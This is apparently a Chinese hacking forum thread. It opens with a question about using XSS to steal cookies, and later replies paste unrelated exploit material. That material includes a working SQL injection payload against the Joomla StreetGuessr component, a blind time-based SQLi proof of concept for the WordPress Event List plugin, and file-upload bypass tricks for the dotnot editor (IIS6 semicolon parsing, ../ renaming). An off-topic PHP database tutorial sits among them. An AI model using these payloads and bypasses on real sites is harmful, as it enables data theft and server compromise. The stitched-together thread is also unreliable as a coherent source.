最近看过此主题的会员

返回列表 发帖

求教XSS

XSS听说可以欺骗cookies,但不知怎么利用它

 

您可能还想看的主题:

Multiple XSS in eShop for Wordpress

06.28_sina_XSS 新浪微薄 XSS Worm 攻击事件始末分析

Discuz 0day 多版本鸡肋存储型XSS漏洞

XSS - 攻擊與防禦手冊

精选XSS脚本代码!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:chenming123发表,本帖发表者chenming123符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者chenming123和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

自己先顶上,呵呵~!

TOP

1# chenming123
附件可以下载回去研究研究
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

TOP

我去T喽 每个帖子都T 坚决T

TOP

看来还是要好好研究一下才行,这门学问真高深。
知识储备不够啊。。

TOP

5# webmaster
    下载你的东东还要我钱呢

  {:3_48:}

TOP

Joomla! Component StreetGuessr Game v1.1.8 SQL注入漏洞
# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
# Dork: N/A
# Date: 03.08.2017
# Vendor : https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/en/component/streetguess/
# Version: 1.1.8
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL]
# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-

# Etc..
# # # # #


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

dotnot编辑器字符过滤漏洞
没对一些字符过滤造成漏洞。 dotnot百科http://baike.baidu.com/view/1678378.htm
[/quote]
[quote]1. IIS6.0+03 直接传x.asp;x.jpg  也可建X.ASP文件夹
2. 如果上传目录没有执行权限,再次利用重命名功能可以,重命名名字加上 ../ 可以实现文件移动到上级目录,这样就可以突破上传目录没执行权限问题
3. 文件上传处有个高级设置,可以自定义上传格式,如果disable,可以自己用chrome把disable去掉,JS控制的。

新版本已经修复了,老版本好像没找到关于类的版本号说明,所以具体哪个版本不清楚-_-


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

3种php连接Access数据库的方法
在PHP中连接Access有如下3种方式。 (1)创建系统数据源,用PHP提供的ODBC函数即可。(2)同样可以使用PHP的ODBC函数,但不创建数据源。开放数据库连接(Open DateBase Conection,ODBC)是Windows Open Server(开放服务)API(WOSA)产品之一。一个数据源是对数据库的一个命名连接。对于应用程序要连接的不同类型的数据库,都需要一个ODBC 驱动程序。ODBC API主要是为客户/服务器的RDBMS使用设计的,但是ODBC驱动程序也可以用于连接桌面数据库文件、工作表和平面文件。ODBC使用 Odbcinst.dll库来设置和清除数据源。Odbcad32.exe是一个用于建立ODBC数据源的独立的32位可执行应用程序,在控制面板中有其对应的图标Control Panel。ODBC驱动管理程序为数据源打开ODBC驱动程序并将 SQL语句传送给驱动程序。在客户/服务器RDBMS处理完一个select查询后,ODBC驱动程序将值返回给应用程序。当执行一个insert、 update或delete语句时,驱动程序返回查询所影响的行数。下面介绍PHP使用ODBC连接Access 数据库的方法。用$connstr=DRIVER= Microsoft Access Driver (*.mdb)来设置数据驱动,函数realpath()用来取得数据库的相对路径。利用该方法连接Access数据库主要应用到PHP的 odbc_connect()函数,该函数声明如下: 以下为引用的内容:resourse odbc_connect( string dsn string user string password [ int cursor_type])dsn:系统dsn名称user:数据库服务器某用户名。password:数据库服务器某用户密码。 cursor_type:游标类型。代码如下:以下为引用的内容:$connstr=DRIVER=Microsoft Access Driver (*.mdb);DBQ=.realpath(bookinfo.mdb);$connid=odbc_connect($connstrSQL_CUR_USE_ODBC );(3)使用微软的ADODB数据库驱动。ActiveX Data Objects(ADO)是Microsoft开放数据库应用程序的数据库访问技术。它被设计用来同新的数据访问层OLE DB Provider一起协同工作,提供通用数据访问(Universal Date Access)。OLE DB是一个低层的数据访问接口,用它可以访问各种数据源,包括传统的关系型数据库、电子邮件系统及自定义的商业对象。ADO技术大大简化了OLE DB的操作,因为ADO封装了OLE DB程序中使用的大量COM接口,所以ADO是一种高层的访问技术。 ADO技术基于通用对象模型(COM),它提供了多种语言的访问技术。PHP是通过预先定义类COM来使用ADO方法操纵Access数据库的。该类详细说明如下:以下为引用的内容:string com::com( string module_name [ string server_name [ int codepage]])module_name:被请求组件的名字或class-id。server_name:DCOM服务器的名字。Codepage:指定用于将PHP字符串转换成UNICODE字符串的代码页,反之亦然。该参数的取值有CP_ACP、CP_MACCP、CP_OEMCP、CP_SYMBOL、CP_THREAD_ACP、CP_UTF7和CP_UTF8。PHP利用com类并使用ADO方法访问数据库的代码如下:以下为引用的内容:$conn = new com(ADODB.Connection);$connstr = DRIVER={Microsoft Access Driver (*.mdb)}; DBQ= . realpath(bookinfo.mdb );$conn->Open($connstr);


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:
  
     
  
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.
  
   
  
2. Proof of Concept:
  
   
  
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
=1 AND SLEEP(10)

  
   
  
3. Solution:
  
     
  
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
  
   
  
4. Reference:
  
   
  
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/
  
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表